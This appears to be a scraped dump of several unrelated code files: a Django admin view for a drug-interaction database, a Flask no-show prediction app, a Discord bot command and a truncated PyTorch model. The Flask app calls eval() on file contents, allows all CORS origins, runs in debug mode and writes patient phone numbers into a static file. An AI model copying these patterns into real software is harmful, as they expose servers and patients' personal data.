([i]))\n\t\t\tr=cur.fetchall()\n\t\t\tlistIbis.append(r)\n\t\tfor j in listF:\n\t\t\tcur.execute(\"\"\"SELECT subst_name, food FROM food_interactions WHERE food_int_id=%s\"\"\", ([j]))\n\t\t\tr=cur.fetchall()\n\t\t\tlistFbis.append(r)\n\t\tif request.POST.get(\"remove_drug\"):\n\t\t\tfor drug in listD:\n\t\t\t\tcur.execute(\"DELETE FROM drug WHERE name=%s;\",([drug]))\n\t\t\tmessages.success(request, f'You removed one or more drugs!')\n\t\t\treturn render(request, 'DrugiComp/admin_page.html')\n\t\tif request.POST.get(\"remove_substance\"):\n\t\t\tfor subst in listS:\n\t\t\t\tcur.execute(\"DELETE FROM substance WHERE name=%s;\",([subst]))\n\t\t\tmessages.success(request, f'You removed one or more substances and all attributes linked to them!')\n\t\t\treturn render(request, 'DrugiComp/admin_page.html')\n\t\tif request.POST.get(\"remove_interaction\"):\n\t\t\tfor interaction in listI:\n\t\t\t\tcur.execute(\"DELETE FROM interactions WHERE int_id=%s\",([interaction]))\n\t\t\tmessages.success(request, f'You removed one or more interactions!')\n\t\t\treturn render(request, 'DrugiComp/admin_page.html')\n\t\tif request.POST.get(\"remove_food_interaction\"):\n\t\t\tfor fi in listF:\n\t\t\t\tcur.execute(\"DELETE FROM food_interactions WHERE food_int_id=%s\",([fi]))\n\t\t\tmessages.success(request, f'You removed one or more food interactions!')\n\t\t\treturn render(request, 'DrugiComp/admin_page.html')\n\t\tpossibilities=['drug','substance','interactions','food_interactions']\n\t\tcontext={'obj':obj, 'possibilities':possibilities, 'd_res':d_res, 's_res':s_res, 'i_res':i_res, \n\t\t\t\t'f_res':f_res, 'listD':listD, 'listS':listS, 'listI':listI, 'listF':listF, \n\t\t\t\t'listIbis':listIbis, 'listFbis':listFbis, 'session':session}\n\t\treturn render(request, 'DrugiComp/remove_dsi.html',context)\n\tif session==None:\n\t\tcontext={'title':'Error', 'session':session}\n\t\treturn render(request, 'DrugiComp/error.html', context)\n\ndef view_database(request):\n\tsession=request.session.get('username')\n\tif session!=None:\n\t\tcur=connection.cursor()\n\t\tcur.execute(\"SELECT * FROM drug\")\n\t\td_res=cur.fetchall()\n\t\tcur.execute(\"SELECT * FROM substance\")\n\t\ts_res=cur.fetchall()\n\t\tcur.execute(\"SELECT * FROM interactions\")\n\t\ti_res=cur.fetchall()\n\t\tcur.execute(\"SELECT * FROM food_interactions\")\n\t\tf_res=cur.fetchall()\n\t\tcontext={'d_res':d_res, 'i_res':i_res, 's_res':s_res, 'f_res':f_res, 
'session':session}\n\t\treturn render(request, 'DrugiComp/view_database.html', context)\n\tif session==None:\n\t\tcontext={'title':'Error', 'session':session}\n\t\treturn render(request, 'DrugiComp/error.html', context)\n\ndef add_int_foodint(request):\n\tsession=request.session.get('username')\n\tif session!=None:\n\t\tcur=connection.cursor()\n\t\t# Drug interaction part\n\t\tobj=request.POST.get(\"object\")\n\t\tsubst_a=request.POST.get(\"subst_a\")\n\t\tsubst_b=request.POST.getlist(\"subst_b\")\n\t\texist_s=CheckExistingSubstance(subst_a)\n\t\tcur.execute(\"SELECT name FROM substance GROUP BY name\")\n\t\tlist_subst=cur.fetchall()\n\t\tsubst_b_list=\"\"\n\t\tif subst_a:\n\t\t\tcur.execute(\"\"\"SELECT name FROM substance \n\t\t\t\t\t\tWHERE name NOT IN (SELECT subst_b \n\t\t\t\t\t\t\t\t\t\t\tFROM interactions WHERE subst_a=%s) \n\t\t\t\t\t\t\tAND name!=%s GROUP BY name\"\"\", ([subst_a], [subst_a]))\n\t\t\tsubst_b_list=cur.fetchall()\n\t\tif request.POST.get(\"new_interaction\"):\n\t\t\tfor row in subst_b:\n\t\t\t\tdescription=None\n\t\t\t\tcur.execute(\"\"\"SELECT max(int_id) FROM interactions;\"\"\")\n\t\t\t\tr=cur.fetchall()\n\t\t\t\tfor i in r:\n\t\t\t\t\tmax_id=i[0]\n\t\t\t\tif request.POST.get(\"description\"+row)!=\"\":\n\t\t\t\t\tdescription=request.POST.get(\"description\"+row)\n\t\t\t\tlevel=request.POST.get(\"level\"+row)\n\t\t\t\tcur.execute(\"\"\"INSERT INTO interactions \n\t\t\t\t\tVALUES (%s,%s, %s, %s, %s)\"\"\", ([max_id+1],[subst_a],[row],[description],[level]))\n\t\t\tmessages.success(request, f'You added an interaction!')\n\t\t\treturn render(request, 'DrugiComp/admin_page.html')\n\t\t# Food interaction part\n\t\tfi_subst=request.POST.get(\"fi_subst\")\n\t\tfi_exist_s=CheckExistingSubstance(fi_subst)\n\t\tfood=request.POST.get(\"food\")\n\t\texist_fi=CheckExistingFoodInteraction(fi_subst, food)\n\t\tcur.execute(\"SELECT DISTINCT food FROM food_interactions;\")\n\t\tlist_food=cur.fetchall()\n\t\tindication=request.POST.get(\"indication\")\n\t\tif request.POST.get(\"new_food_interaction\"):\n\t\t\tcur.execute(\"\"\"SELECT max(food_int_id) FROM food_interactions;\"\"\")\n\t\t\tr=cur.fetchall()\n\t\t\tfor i in r:\n\t\t\t\tmax_id=i[0]\n\t\t\tcur.execute(\"\"\"INSERT INTO food_interactions VALUES (%s, %s, %s, %s)\"\"\", ([max_id+1],[fi_subst],[food],[indication]))\n\t\t\tmessages.success(request, f'You added a food interaction!')\n\t\t\treturn render(request, 'DrugiComp/admin_page.html')\n\t\tpossibilities=['interaction','food_interaction', 'Avoid', 'Limit']\n\t\tcontext={'possibilities':possibilities, 'obj':obj, 'exist_s':exist_s, 'list_subst':list_subst, \n\t\t\t\t'subst_a':subst_a, 'subst_b_list':subst_b_list, 'subst_b':subst_b, 'food':food, \n\t\t\t\t'list_food':list_food, 'fi_subst':fi_subst, 'fi_exist_s':fi_exist_s, 'exist_fi':exist_fi,\n\t\t\t\t'indication':indication, 'session':session}\n\t\treturn render(request, 'DrugiComp/add_int_foodint.html', context)\n\tif session==None:\n\t\tcontext={'title':'Error', 'session':session}\n\t\treturn render(request, 'DrugiComp/error.html', context)\n\ndef modify_dsi(request):\n\tsession=request.session.get('username')\n\tif session!=None:\n\t\tcur=connection.cursor()\n\t\tobj=request.POST.get(\"object\")\n\n\t\t# Drug modifying\n\t\tcur.execute(\"SELECT * FROM drug\")\n\t\td_res=cur.fetchall()\n\t\tdrug=request.POST.get(\"drug_name\")\n\t\tnew_drug=request.POST.get(\"new_drug\")\n\t\texist_d=CheckExistingDrug(drug)\n\t\texist_nd=CheckExistingDrug(new_drug)\n\t\tif 
request.POST.get(\"modify_drug_name\"):\n\t\t\tcur.execute(\"\"\"UPDATE drug SET name =%s WHERE (name = %s);\"\"\", ([new_drug],[drug]))\n\t\t\tmessages.success(request, f'You modified the name of a drug!')\n\t\t\treturn render(request, 'DrugiComp/admin_page.html')\n\n\t\t# Substance modifying\n\t\tcur.execute(\"SELECT * FROM substance\")\n\t\ts_res=cur.fetchall()\n\t\tsubst=request.POST.get(\"subst_name\")\n\t\trecommendation=request.POST.get(\"recommendation\")\n\t\texist_s=CheckExistingSubstance(subst)\n\t\tsubst_objet=request.POST.get(\"subst_objet\")\n\t\tnew_subst=request.POST.get(\"new_subst\")\n\t\texist_ns=CheckExistingSubstance(new_subst)\n\t\tposs_subst=['new_subst_name', 'new_recommendation']\n\t\tif request.POST.get(\"modify_subst_name\"):\n\t\t\tcur.execute(\"\"\"UPDATE substance SET name =%s WHERE (name = %s);\"\"\", ([new_subst],[subst]))\n\t\t\tmessages.success(request, f'You modified the name of a substance!')\n\t\t\treturn render(request, 'DrugiComp/admin_page.html')\n\t\tif request.POST.get(\"modify_recommendation\"):\n\t\t\tcur.execute(\"\"\"UPDATE substance SET recommendation =%s WHERE (name = %s);\"\"\", ([recommendation],[subst]))\n\t\t\tmessages.success(request, f'You modified the recommendation of a substance!')\n\t\t\treturn render(request, 'DrugiComp/admin_page.html')\n\t\tcur.execute(\"\"\"SELECT recommendation FROM substance WHERE name=%s\"\"\", ([subst]))\n\t\tr=cur.fetchall()\n\t\trecom_subst=\"\"\n\t\tfor row in r:\n\t\t\trecom_subst=row[0]\n\n\t\t# Interaction modifying\n\t\tcur.execute(\"SELECT * FROM interactions\")\n\t\ti_res=cur.fetchall()\n\t\ttick_interaction=request.POST.get(\"tick_interaction\")\n\t\tcur.execute(\"SELECT subst_a, subst_b, description, level FROM interactions WHERE int_id=%s\", ([tick_interaction]))\n\t\tselected_interaction=cur.fetchall()\n\t\tdescription=request.POST.get(\"description\")\n\t\tlevel=request.POST.get(\"level\")\n\t\tif request.POST.get(\"modify_interaction\"):\n\t\t\tcur.execute(\"\"\"UPDATE interactions SET description = %s WHERE (int_id = %s);\"\"\", ([description],[tick_interaction]))\n\t\t\tcur.execute(\"\"\"UPDATE interactions SET level = %s WHERE (int_id = %s);\"\"\", ([level],[tick_interaction]))\n\t\t\tmessages.success(request, f'You modified the description and/or level of an interaction!')\n\t\t\treturn render(request, 'DrugiComp/admin_page.html')\n\t\t\n\t\t# Food interaction modifying\n\t\tcur.execute(\"SELECT * FROM food_interactions\")\n\t\tf_res=cur.fetchall()\n\t\ttick_fi=request.POST.get(\"tick_fi\")\n\t\tcur.execute(\"SELECT subst_name,food,indication FROM food_interactions WHERE food_int_id=%s\", ([tick_fi]))\n\t\tselected_fi=cur.fetchall()\n\t\tindication=request.POST.get(\"indication\")\n\t\tposs_fi=['Avoid', 'Limit']\n\t\tif request.POST.get(\"modify_food_interaction\"):\n\t\t\tcur.execute(\"\"\"UPDATE food_interactions SET indication = %s WHERE (food_int_id = %s);\"\"\", ([indication],[tick_fi]))\n\t\t\tmessages.success(request, f'You modified the indication of a food interaction!')\n\t\t\treturn render(request, 'DrugiComp/admin_page.html')\n\n\t\tpossibilities=['drug','substance','interactions','food_interactions']\n\t\tcontext={'obj':obj, 'possibilities':possibilities, 'drug':drug, 'exist_d':exist_d, 'd_res':d_res,\n\t\t\t\t'new_drug':new_drug, 'exist_nd':exist_nd, 's_res':s_res, 'subst':subst, 'exist_s':exist_s,\n\t\t\t\t'recom_subst':recom_subst, 'recommendation':recommendation, 'poss_subst':poss_subst, 'subst_objet':subst_objet,\n\t\t\t\t'poss_subst':poss_subst, 'new_subst':new_subst, 
'exist_ns':exist_ns, 'i_res':i_res, \n\t\t\t\t'tick_interaction':tick_interaction, 'selected_interaction':selected_interaction, \n\t\t\t\t'description':description, 'f_res':f_res, 'tick_fi':tick_fi, 'selected_fi':selected_fi,\n\t\t\t\t'indication':indication, 'poss_fi':poss_fi, 'session':session}\n\t\treturn render(request, 'DrugiComp/modify_dsi.html', context)\n\tif session==None:\n\t\tcontext={'title':'Error', 'session':session}\n\t\treturn render(request, 'DrugiComp/error.html', context)\n","repo_name":"isterbollen/CookieDough2","sub_path":"project_django/DrugiComp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":23211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
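CheckAdmin above compares the submitted password against a hash stored in the second column of the administrator table; a one-off seeding sketch for that table (the column names `name` and `password` are assumptions inferred from the queries):

from django.contrib.auth.hashers import make_password
from django.db import connection

def create_admin(name, raw_password):
    # Hash with Django's default hasher so CheckAdmin's check_password call succeeds.
    with connection.cursor() as cur:
        cur.execute("INSERT INTO administrator(name, password) VALUES (%s, %s)",
                    [name, make_password(raw_password)])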
+{"seq_id":"21426021846","text":"import numpy as np\r\nimport pandas as pd\r\nfrom flask import Flask, request, jsonify, render_template\r\nimport pickle\r\nfrom datetime import datetime\r\nimport json\r\nimport os\r\nfrom flask_cors import CORS\r\n\r\napp = Flask(__name__)\r\nCORS(app, resources={r\"/*\": {\"origins\": \"*\"}})\r\nmodel = pickle.load(open('model.pkl', 'rb'))\r\n\r\n@app.route('/')\r\ndef home():\r\n return render_template('home.html')\r\n\r\n@app.route('/dashboard')\r\ndef dashboard():\r\n return render_template('home.html')\r\n\r\n@app.route('/appointment')\r\ndef appointment():\r\n return render_template('appointment.html')\r\n\r\n@app.route('/schedule')\r\ndef schedule():\r\n return render_template('schedule.html')\r\n\r\nop = np.array([dict(((\"pt\", \"\"), (\"gender\", \"\"), (\"phone\", \"\"),(\"last_reminder\", str(datetime.strptime('1900-01-01', '%Y-%m-%d').date())), (\"Confirmed\",0), (\"provider\",\"\"), (\"dept\", \"\"), (\"age\", 0), (\"sms\", 0), (\"apdt\", str(datetime.strptime('1900-01-01', '%Y-%m-%d').date())), (\"scdt\", str(datetime.strptime('1900-01-01', '%Y-%m-%d').date())), (\"insight\",\"\"), (\"pred\", 0)))])\r\n@app.route('/submit', methods=['GET', 'POST'])\r\ndef submit():\r\n import json\r\n import os\r\n\r\n src_path = os.getcwd()\r\n int1_data_path = src_path + '/Data/Output/int1.json'\r\n int2_data_path = src_path + '/Data/Output/int2.json'\r\n int3_data_path = src_path + '/Data/Output/int3.json'\r\n finop_data_path = src_path + '/static/json/JSON_Data.json'\r\n finop1_data_path = src_path + '/Data/Output/finalop1.json'\r\n patname = str(request.values.get(\"Name\"))\r\n age = request.values.get(\"Age\")\r\n gender = request.values.get(\"Gender\")\r\n phone = request.values.get(\"Phone\")\r\n lstremdt = request.values.get(\"Last Reminder\")\r\n sms = request.values.get(\"Sms Received\")\r\n dept = request.values.get(\"Department\")\r\n provider = request.values.get(\"Provider\")\r\n confirmed = request.values.get(\"Confirmation\")\r\n \r\n \r\n if request.values.get(\"Appointment Date\") == None:\r\n appdt = datetime.strptime('1900-01-01', '%Y-%m-%d').date()\r\n else:\r\n appdt = datetime.strptime(request.values.get(\"Appointment Date\"), '%Y-%m-%d').date()\r\n \r\n if request.values.get(\"Schedule Date\") == None:\r\n schdt = datetime.strptime('1900-01-01', '%Y-%m-%d').date()\r\n else:\r\n schdt = datetime.strptime(request.values.get(\"Schedule Date\"), '%Y-%m-%d').date()\r\n \r\n deltday = abs((appdt - schdt).days)\r\n if request.values.get(\"Sms Received\") == 1:\r\n smspred = 0\r\n else:\r\n smspred = 1\r\n \r\n inp = np.array([age, 0, confirmed, smspred, deltday]).reshape(1, 5)\r\n \r\n if request.values.get(\"Age\") == None:\r\n prediction = 0\r\n else:\r\n prediction = round(model.predict_proba(inp)[0][1] *100, 2) \r\n \r\n \r\n global op\r\n # if patname =='Matt Innae':\r\n # op = np.append(op, np.array([dict(((\"pt\", patname),(\"gender\", gender), (\"phone\", phone),(\"last_reminder\", str(lstremdt)), (\"Confirmed\", confirmed),(\"provider\", provider), (\"dept\",dept), (\"age\", int(age)), (\"sms\", int(sms)), (\"apdt\", str(appdt)), (\"scdt\", str(schdt)), (\"insight\", \"Appointment booked long ago\"), (\"pred\", prediction)))]))\r\n # elif patname =='Gene Jacket':\r\n # op = np.append(op, np.array([dict(((\"pt\", patname),(\"gender\", gender), (\"phone\", phone),(\"last_reminder\", str(lstremdt)), (\"Confirmed\", confirmed),(\"provider\", provider), (\"dept\",dept), (\"age\", int(age)), (\"sms\", int(sms)), (\"apdt\", 
str(appdt)), (\"scdt\", str(schdt)), (\"insight\", \"Confirmation not received\"), (\"pred\", prediction)))]))\r\n # else:\r\n # op = np.append(op, np.array([dict(((\"pt\", patname),(\"gender\", gender), (\"phone\", phone),(\"last_reminder\", str(lstremdt)), (\"Confirmed\", confirmed),(\"provider\", provider), (\"dept\",dept), (\"age\", int(age)), (\"sms\", int(sms)), (\"apdt\", str(appdt)), (\"scdt\", str(schdt)), (\"insight\",\"\"), (\"pred\", prediction)))]))\r\n \r\n \r\n if prediction < 50 :\r\n if confirmed == \"1\" and deltday >= 7 :\r\n op = np.append(op, np.array([dict(((\"pt\", patname),(\"gender\", gender), (\"phone\", phone),(\"last_reminder\", str(lstremdt)), (\"Confirmed\", confirmed),(\"provider\", provider), (\"dept\",dept), (\"age\", int(age)), (\"sms\", int(sms)), (\"apdt\", str(appdt)), (\"scdt\", str(schdt)), (\"insight\", \"Appointment booked long ago\"), (\"pred\", prediction)))])) \r\n elif confirmed == \"0\" and deltday < 7 :\r\n op = np.append(op, np.array([dict(((\"pt\", patname),(\"gender\", gender), (\"phone\", phone),(\"last_reminder\", str(lstremdt)), (\"Confirmed\", confirmed),(\"provider\", provider), (\"dept\",dept), (\"age\", int(age)), (\"sms\", int(sms)), (\"apdt\", str(appdt)), (\"scdt\", str(schdt)), (\"insight\", \"Confirmation not received\"), (\"pred\", prediction)))]))\r\n elif confirmed == \"0\" and deltday >= 7 :\r\n op = np.append(op, np.array([dict(((\"pt\", patname),(\"gender\", gender), (\"phone\", phone),(\"last_reminder\", str(lstremdt)), (\"Confirmed\", confirmed),(\"provider\", provider), (\"dept\",dept), (\"age\", int(age)), (\"sms\", int(sms)), (\"apdt\", str(appdt)), (\"scdt\", str(schdt)), (\"insight\", \"Appointment booked long ago and Confirmation not received\"), (\"pred\", prediction)))]))\r\n else:\r\n op = np.append(op, np.array([dict(((\"pt\", patname),(\"gender\", gender), (\"phone\", phone),(\"last_reminder\", str(lstremdt)), (\"Confirmed\", confirmed),(\"provider\", provider), (\"dept\",dept), (\"age\", int(age)), (\"sms\", int(sms)), (\"apdt\", str(appdt)), (\"scdt\", str(schdt)), (\"insight\",\"\"), (\"pred\", prediction)))])) \r\n \r\n \r\n \r\n oplist = op.tolist()\r\n oplist.pop(0)\r\n #print(oplist)\r\n srcdict = (dict(enumerate(oplist)))\r\n \r\n s = []\r\n for d in srcdict.values():\r\n s.append(d['pt'])\r\n \r\n for i in range(0, len(s)):\r\n for key in range(i,i+1):\r\n srcdict[s[i]] = srcdict.pop(key)\r\n \r\n with open(finop_data_path, \"r\") as f:\r\n lines = (str(f.readlines())[10::])\r\n lines = (lines[:len(lines)-4])\r\n #print(lines)\r\n \r\n with open(int1_data_path, \"w\") as f:\r\n f.write(lines)\r\n f.close()\r\n \r\n with open(int1_data_path, \"r\") as f:\r\n dataorg = json.load(f)\r\n f.close()\r\n # print(dataorg)\r\n origdict = (dict(enumerate(dataorg)))\r\n # print(origdict)\r\n s1 = []\r\n for d in origdict.values():\r\n s1.append(d['pt'])\r\n \r\n for i in range(0, len(s1)):\r\n for key in range(i,i+1):\r\n origdict[s1[i]] = origdict.pop(key)\r\n \r\n origdict.update(srcdict)\r\n # print(origdict)\r\n \r\n with open(int2_data_path, \"w\") as f:\r\n json.dump(origdict, f)\r\n f.close() \r\n \r\n l = []\r\n for i in origdict.keys():\r\n l.append(origdict[i])\r\n \r\n with open(int3_data_path, \"w\") as f:\r\n json.dump(l, f)\r\n f.close()\r\n \r\n with open(int3_data_path, \"w\") as f:\r\n f.write(str(l).replace(\"'\", \"\\\"\"))\r\n f.close()\r\n \r\n with open(int3_data_path, \"r\") as f:\r\n lines = (str(f.readlines())[1::])\r\n lines = (lines[:len(lines)-1])\r\n finop = 'data =' + lines\r\n \r\n 
with open(finop_data_path, \"w\") as f:\r\n f.write(finop)\r\n f.close()\r\n \r\n return render_template('appointment.html', prediction_text = 'Appointment Chance {} %'.format(prediction), patient_name = format(patname))\r\n\r\n@app.route('/caldata')\r\ndef event_calender():\r\n base_dir = os.getcwd()\r\n data_path = base_dir + '/static/json/JSON_Data.json'\r\n\r\n with open(data_path, \"r\") as f:\r\n lines = str(f.readlines())\r\n\t\r\n\t#Extract the embedded patient JSON from the 'data =' assignment\r\n a = lines.split(\"data =\")[1]\r\n a = a.split(\"\\'\")[1]\r\n a = a.split(\"]\")[0]\r\n a = a.split(\"[\")[1]\r\n\r\n\t#Create Dictionary\r\n dic = eval(a)\r\n\r\n\t#Create Derived Columns\r\n for i in range(len(dic)):\r\n if (dic[i]['Confirmed']) == '1':\r\n dic[i]['Cnf'] = 1\r\n else:\r\n dic[i]['Cnf'] = 0\r\n \r\n for i in range(len(dic)):\r\n if (dic[i]['pred']) > 50:\r\n dic[i]['High'] = 1\r\n else:\r\n dic[i]['High'] = 0\r\n \r\n for i in range(len(dic)):\r\n if (dic[i]['pred']) <= 50:\r\n dic[i]['Lo'] = 1\r\n else:\r\n dic[i]['Lo'] = 0\r\n\r\n\t#Convert to dataframe\r\n diclist = list(dic)\r\n df = pd.DataFrame(diclist)\r\n df_new = pd.DataFrame()\r\n df_new = df [['pt']]\r\n df_new['apdt'] = df [['apdt']]\r\n df_new['High'] = df [['High']]\r\n df_new['Lo'] = df [['Lo']]\r\n df_new['Cnf'] = df [['Cnf']]\r\n\r\n\t#Calculate aggregate metrics\r\n df_op = df_new.groupby(['apdt'])['High'].sum()\r\n df_op = df_op.to_frame()\r\n df_op['Lo'] = df_new.groupby(['apdt'])['Lo'].sum()\r\n df_op['Cnf'] = df_new.groupby(['apdt'])['Cnf'].sum()\r\n df_op['Total'] = df_new.groupby(['apdt'])['pt'].count()\r\n df_op = df_op.reset_index()\r\n df_op = df_op.rename(columns={\"apdt\": \"date\"})\r\n\r\n\t#Convert to Dictionary\r\n df_dict = df_op.to_dict('records')\r\n \r\n dlist = []\r\n for i in range(len(df_dict)):\r\n df_newdict = {\r\n \"date\": df_dict[i]['date'],\r\n \"event\": [\r\n {\r\n \"color\": \"violet\", \r\n \"name\": \"Appointments\", \r\n \"value\": df_dict[i]['Total']\r\n }, \r\n #{\r\n #\"color\": \"green\", \r\n #\"name\": \"Confirmed\", \r\n #\"value\": df_dict[i]['Cnf']\r\n #}, \r\n {\r\n \"color\": \"red\", \r\n \"name\": \"Low Probability\", \r\n \"value\": df_dict[i]['Lo']\r\n }, \r\n {\r\n \"color\": \"amber\", \r\n \"name\": \"High Probability\", \r\n \"value\": df_dict[i]['High']\r\n }]\r\n }\r\n dlist.append(df_newdict.copy())\r\n\r\n return(jsonify(dlist))\r\n \r\nif __name__ == \"__main__\":\r\n app.run(debug=True)\r\n","repo_name":"SGRGit/noshowprediction","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
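The /submit handler above reads its inputs by the exact names used in its request.values.get calls; a hedged smoke test against a locally running instance (host/port are Flask's defaults, and the field values are invented):

import requests  # third-party client, assumed installed for the test

resp = requests.post("http://127.0.0.1:5000/submit", data={
    "Name": "Jane Doe", "Age": "42", "Gender": "Female", "Phone": "555-0100",
    "Last Reminder": "2023-01-01", "Sms Received": "1",
    "Department": "Cardiology", "Provider": "Dr. Smith", "Confirmation": "1",
    "Appointment Date": "2023-02-01", "Schedule Date": "2023-01-20",
})
print(resp.status_code)  # the view re-renders appointment.html with the prediction text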
+{"seq_id":"2218824659","text":"\"\"\"$to get\"\"\"\nimport discord\n\nfrom offthedialbot import utils\n\n\nclass ToGet(utils.Command):\n\n @classmethod\n @utils.deco.require_role(\"Staff\")\n async def main(cls, ctx, user: discord.User):\n \"\"\"Retrieve the profile and signup of a user.\"\"\"\n user = utils.User(user.id)\n await cls.send_user_embed(ctx, user)\n await cls.send_signup_embed(ctx, user)\n\n @classmethod\n async def send_user_embed(cls, ctx, user: utils.User):\n if not user.doc.exists:\n await utils.Alert(ctx, utils.Alert.Style.DANGER, title=\"User doesn't have an account!\")\n try:\n d = user.discord(ctx.bot)\n if d:\n name, mention = d.name, d.mention\n else:\n name, mention = user.id, \"N/A\"\n\n embed = discord.Embed(\n title=name,\n description=\"\\n\".join([\n f\"`User Mention: ` **{mention}**\",\n f\"`SplashTag: ` **`{user.dict['profile']['splashtag']}`**\",\n f\"`SW: ` **`{user.dict['profile']['sw']}`**\",\n f\"`Rank: ` **`{user.get_rank()}`**\",\n f\"`Weapons: ` \\n> {user.get_weapons()}\",\n f\"`Competitive Exp:` \\n> {user.dict['profile']['cxp']}\",\n f\"`Smash.gg Info: ` **`{(await user.smashgg())['player']['gamerTag']}`** **(`{user.dict['profile']['slug']}`)**\",\n f\"`Signal Strength:` **`{user.dict['meta']['signal']}`**\",\n ]))\n await utils.CommandUI.create_ui(ctx, embed)\n except KeyError:\n await utils.CommandUI.create_ui(ctx, discord.Embed(\n title=name,\n description=f\"```\\n{user.dict}\\n```\"))\n\n @classmethod\n async def send_signup_embed(cls, ctx, user: utils.User):\n signup = user.signup(ignore_ended=True)\n if not signup:\n return\n embed = discord.Embed(\n color=utils.colors.COMPETING,\n title=signup.col.capitalize(),\n description=\"\\n\".join([\n f\"`Signup Date: ` **`{signup.dict['signupDate']}`**\",\n f\"`Modified Date:` **`{signup.dict['modifiedDate']}`**\",\n f\"`Timezone: ` **`{signup.dict['timezone']}`**\",\n ]))\n await utils.CommandUI.create_ui(ctx, embed)\n","repo_name":"offthedial/bot","sub_path":"offthedialbot/commands/to/get.py","file_name":"get.py","file_ext":"py","file_size_in_byte":2375,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"}
+{"seq_id":"38629518889","text":"from enum import Enum\nimport math\nimport torch\nimport torch.nn as nn\nimport torch.nn.utils.rnn as tnur\nfrom typing import List, Tuple, Type\nfrom . import seq\n\n\nclass StrideOn(Enum):\n First = 0\n Last = 1\n All = 2\n\n\ndef _depth_cat(h: torch.Tensor, depth: int) -> torch.Tensor:\n dshape = (h.shape[0], 1, h.shape[2])\n d = torch.full(dshape, math.log1p(depth), device=h.device)\n return torch.cat([h, d], dim=1)\n\n\nclass Block(nn.Module):\n def __init__(\n self,\n seq_conv_cls: Type[seq.ConvBase],\n channels: int, kernel_size: int, stride: int, pad_delta: int,\n leak: float = 0.0, layer_norm: bool = True, depth_variant: bool = True\n ) -> None:\n super().__init__()\n self.channels = channels\n self.kernel_size = kernel_size\n self.stride = stride\n self.pad_delta = pad_delta\n self.leak = leak\n self.layer_norm = layer_norm\n self.depth_variant = depth_variant\n self.conv1 = seq_conv_cls(\n in_channels=channels + (1 if depth_variant else 0),\n out_channels=channels * 2,\n kernel_size=kernel_size,\n stride=stride,\n pad_delta=pad_delta)\n self.norm1 = seq.LayerNorm() if layer_norm else None\n self.conv2 = seq_conv_cls(\n in_channels=channels + (1 if depth_variant else 0),\n out_channels=channels,\n kernel_size=kernel_size,\n stride=1,\n pad_delta=1)\n self.norm2 = seq.LayerNorm() if layer_norm else None\n self.act = nn.LeakyReLU(leak) if leak > 0 else nn.ReLU()\n\n def forward(self, h: torch.Tensor, N: torch.Tensor, depth: int) -> Tuple[torch.Tensor, torch.Tensor]:\n c = self.channels\n if self.depth_variant:\n h = _depth_cat(h, depth)\n lr, N = self.conv1(h, N)\n l = lr[:, :c]\n r = lr[:, c:]\n if self.norm1 is not None:\n r = self.norm1(r, N)\n r = self.act(r)\n if self.depth_variant:\n r = _depth_cat(r, depth)\n r, _ = self.conv2(r, N)\n if self.norm2 is not None:\n r = self.norm2(r, N)\n return l + self.act(r), N\n\n\ndef _stride(layer: int, n_layers: int, stride_on: StrideOn) -> bool:\n if stride_on == StrideOn.All:\n return True\n elif stride_on == StrideOn.First:\n return layer == 0\n elif stride_on == StrideOn.Last:\n return layer == (n_layers - 1)\n else:\n raise ValueError(f'bad stride_on: {stride_on}')\n\n\nclass Reduce(nn.Module):\n def __init__(\n self,\n hidden: int, kernel_size: int, stride: int, layers: int, depth_variant: bool,\n stride_on: StrideOn, leak: float, dropout: float, layer_norm: bool\n ) -> None:\n super().__init__()\n self.hidden = hidden\n self.kernel_size = kernel_size\n self.stride = stride\n self.layers = layers\n self.depth_variant = depth_variant\n self.stride_on = stride_on\n self.leak = leak\n self.dropout = dropout\n self.layer_norm = layer_norm\n self.blocks = nn.ModuleList([\n Block(\n seq_conv_cls=seq.Conv,\n channels=hidden,\n kernel_size=kernel_size,\n stride=stride if _stride(l, layers, stride_on) else 1,\n pad_delta=1,\n leak=leak,\n depth_variant=depth_variant,\n layer_norm=layer_norm)\n for l in range(layers)])\n\n def forward(self, h: torch.Tensor, N: torch.Tensor) -> torch.Tensor:\n if self.training and self.dropout > 0.0:\n mask_shape = (h.shape[0], h.shape[1], 1)\n mask = torch.rand(mask_shape, device=h.device) > self.dropout\n mask = mask / (1 - self.dropout)\n else:\n mask = None\n out = []\n depth = 0\n while h.shape[0] > 0:\n if mask is not None:\n h = mask * h\n for block in self.blocks:\n h, N = block(h, N, depth)\n reduced = (N <= 1)\n out.append(h[reduced, :, 0])\n h = h[~reduced]\n N = N[~reduced]\n if mask is not None:\n mask = mask[~reduced]\n depth += 1\n return torch.cat(out, 
dim=0)\n\n\nclass Classify(nn.Module):\n def __init__(\n self,\n features: int, classes: int,\n inproj_size: int, inproj_stride: int, inproj_norm: bool,\n hidden: int, kernel_size: int, stride: int, layers: int, depth_variant: bool, stride_on: StrideOn,\n outproj_size: int,\n dropout: float, leak: float, layer_norm: bool\n ) -> None:\n super().__init__()\n self.inproj_conv = seq.Conv(\n in_channels=features,\n out_channels=hidden,\n kernel_size=inproj_size,\n stride=inproj_stride,\n pad_delta=1,\n bias=not inproj_norm)\n self.inproj_norm = seq.BatchNorm(hidden) if inproj_norm else None\n self.inproj_act = nn.LeakyReLU(leak) if leak > 0.0 else nn.ReLU()\n self.reduce = Reduce(\n hidden=hidden,\n kernel_size=kernel_size,\n stride=stride,\n layers=layers,\n depth_variant=depth_variant,\n stride_on=stride_on,\n dropout=dropout,\n leak=leak,\n layer_norm=layer_norm)\n self.outproj_lin1 = nn.Linear(\n in_features=hidden,\n out_features=outproj_size)\n self.outproj_act = nn.LeakyReLU(leak) if leak > 0.0 else nn.ReLU()\n self.outproj_lin2 = nn.Linear(\n in_features=outproj_size,\n out_features=classes)\n\n def forward(self, xs: List[torch.Tensor]) -> torch.Tensor:\n N = torch.tensor([x.shape[0] for x in xs], device=xs[0].device, dtype=torch.int)\n x = tnur.pad_sequence(xs, batch_first=True).transpose(1, 2)\n N, sorted_indices = torch.sort(N)\n x = x[sorted_indices]\n h, N = self.inproj_conv(x, N)\n if self.inproj_norm is not None:\n h = self.inproj_norm(h, N)\n h = self.inproj_act(h)\n h = self.reduce(h, N)\n h = self.outproj_lin1(h)\n h = self.outproj_act(h)\n z = 